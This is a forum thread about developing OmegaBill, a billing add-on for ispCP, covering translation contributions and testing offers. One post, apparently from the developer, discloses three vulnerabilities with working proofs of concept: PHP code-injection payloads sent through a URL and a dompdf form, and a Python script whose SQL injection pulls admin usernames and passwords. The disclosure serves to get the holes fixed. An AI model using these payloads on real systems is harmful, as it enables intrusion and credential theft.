Current time: 11-24-2024, 10:39 PM Hello There, Guest! (LoginRegister)


Post Reply 
[DEV] OmegaBill
Author Message
platix Offline


Posts: 3
Joined: Apr 2010
Reputation: 0
Post: #231
RE: [DEV] OmegaBill
Hello all!!!

Here are my contribution.

Spanish translation Big GrinBig Grin

I Found some bugs in translations,
PHP Code:
login.php
32
:  <legend>LOGIN:</legend> ; No translated
37
:      <td width="30%">Username:</td>;----><?php echo $aedm['Username'];?>
45:      <td>Password:</td>;----><?php echo $aedm['Password'];?>
56:      <td><input name="button" id="button" value="Submit" type="submit"></td>; No translated 

index.php
154 to 160: "per page" no translated
paid or unpaid states

settings.php
308:"portrait" no translated
309:"landscape" no translated

"Search" on all pages no translated
"Print this page" on all pages no translated
"Sumit" buttons on all pages no translated

Good work and thanks for the system


regards!


Attached File(s)
.zip  spanish.zip (Size: 4.35 KB / Downloads: 9)
(This post was last modified: 03-18-2011 09:53 PM by platix.)
03-18-2011 09:51 PM
Find all posts by this user Quote this message in a reply
max.samael Offline
Junior Member
*

Posts: 50
Joined: Nov 2009
Reputation: 0
Post: #232
RE: [DEV] OmegaBill
Slovak translation 100%
I add new line:
//coding
$general['charset']='UTF-8';

Coding for head


Attached File(s)
.txt  slovak.lng.txt (Size: 16.99 KB / Downloads: 4)
03-18-2011 11:59 PM
Find all posts by this user Quote this message in a reply
max.samael Offline
Junior Member
*

Posts: 50
Joined: Nov 2009
Reputation: 0
Post: #233
RE: [DEV] OmegaBill
Can I participate with ISPvoice system?
03-19-2011 03:17 AM
Find all posts by this user Quote this message in a reply
shaggy Offline
Junior Member
*

Posts: 32
Joined: Jan 2011
Reputation: 0
Post: #234
RE: [DEV] OmegaBill
Hey oddyutza,
How is it all going, have you managed to finish it yet? I really would like to drop my invoicing program and have it all working in one system. need help with bug testing? post me a link to your current version and I will test it.
(This post was last modified: 03-27-2011 09:08 AM by shaggy.)
03-27-2011 09:07 AM
Find all posts by this user Quote this message in a reply
oddyutza Offline
Junior Member
*

Posts: 132
Joined: Mar 2007
Reputation: 2
Post: #235
RE: [DEV] OmegaBill
hello all,

it seems that OmegaBill has some security problems
All Tested On...............Windows Vista + XAMPP
Vulnerability 1:

http://localhost/OmegaBill_v1.0_Build6/clients/download_invoice.php?invoiceid=<?php system("calc.exe"); ?>

NOTE: client panel is not ready Smile


Vulnerability 2:

POST http://localhost/OmegaBill_v1.0_Build6/plugins/dompdf/www/examples.php HTTP/1.1
Host: localhost
Connection: keep-alive
User-Agent: x
Content-Length: 93
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="html"

<?php system("calc.exe"); ?>
------x--


Vulnerability 3:
import socket

host = 'localhost'
path = '/omegabill_v1.0_build6'

port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('POST ' + path + '/generate_report.php HTTP/1.1\r\n'
'Host: localhost\r\n'
'Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 239\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="startdate"\r\n'
'\r\n'
'\'OR 1 = 1 UNION ALL SELECT CONCAT(username,\':\',password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM admins;#\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="enddate"\r\n'
'\r\n'
'\r\n'
'------x--\r\n'
'\r\n')

print s.recv(8192)

# An authentication bypass/SQL injection vulnerability in OmegaBill v1.0
# Build 6 can be exploited to retreive a list of usernames and passwords.

i will make some changes to the code ASAP
also
there are planned some bigger updates with the new release


@ shaggy : can u please test if the holes are replicated to Unix OS ?
04-16-2011 02:56 AM
Find all posts by this user Quote this message in a reply
shaggy Offline
Junior Member
*

Posts: 32
Joined: Jan 2011
Reputation: 0
Post: #236
RE: [DEV] OmegaBill
I have just got my server back online after a major network change, and the server then deciding it didn't want to work with me, so I am now using Debian, I haven't got Omega bill installed as yet but I will look into it, I am corrently setting up a testing server so I can test things BEFORE putting it on my production server as I think that was one of my downfalls. will post back when it's running
04-18-2011 12:00 AM
Find all posts by this user Quote this message in a reply
anarking Offline
Junior Member
*

Posts: 29
Joined: Nov 2009
Reputation: 0
Post: #237
RE: [DEV] OmegaBill
Hi guys, any movement with this? I can setup a clean ispCP install on a virtual machine with a dedicated IP and load OmegaBill, even give you guys SSH access if you'd like so testing can be done anytime. Let me know, I would love nothing more than for some ordering/billing system to be complete!
06-15-2011 02:56 AM
Find all posts by this user Quote this message in a reply
max.samael Offline
Junior Member
*

Posts: 50
Joined: Nov 2009
Reputation: 0
Post: #238
RE: [DEV] OmegaBill
Hello, any idea with merging ispvoice 1.20 project and omegabill?
I will prepare plugin, that can work with omegabill.
If someone is interested, please, contact me.
07-08-2011 05:38 AM
Find all posts by this user Quote this message in a reply
Post Reply 


Forum Jump:


User(s) browsing this thread: 14 Guest(s)